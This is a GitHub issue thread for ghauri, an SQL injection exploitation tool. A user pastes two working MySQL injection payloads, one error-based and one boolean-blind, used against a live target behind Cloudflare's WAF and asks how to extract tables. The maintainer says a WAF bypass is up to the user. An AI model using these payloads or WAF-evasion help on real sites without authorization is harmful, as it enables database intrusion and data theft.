r0oth3x49 / ghauri

An advanced cross-platform tool that automates the process of detecting and exploiting SQL injection security flaws
MIT License
2.98k stars 299 forks

Unable to retrieve tables from database #180

Open M4st3r1337 opened 1 day ago

M4st3r1337 commented 1 day ago

Hey, I am unable to retrieve anything besides version() and database(). When I try to extract the tables, it says:

[23:28:38] [WARNING] it was not possible to extract query output length for the SQL query provided.

The payloads used to retrieve the database name are:

Parameter: id (GET)
Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE or HAVING clause (FLOOR)
Payload: id=1 OR 1 GROUP BY CONCAT_WS(0x7e,0x72306f746833783439,FLOOR(RAND(0)*2))HAVING(MIN(0))-- wXyW

Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
Payload: id=1 OR NOT 09725=9725-- wXyW

Btw, the target has Cloudflare's WAF. Any help is appreciated.

r0oth3x49 commented 1 day ago

That's an intended response from ghauri. You have to find a way to bypass; ghauri might not have a bypass for that, which is why it returns that warning. If this is a bounty program and you want to collab, I can give it a try. Just send the details to my email: r0oth3x49@gmail.com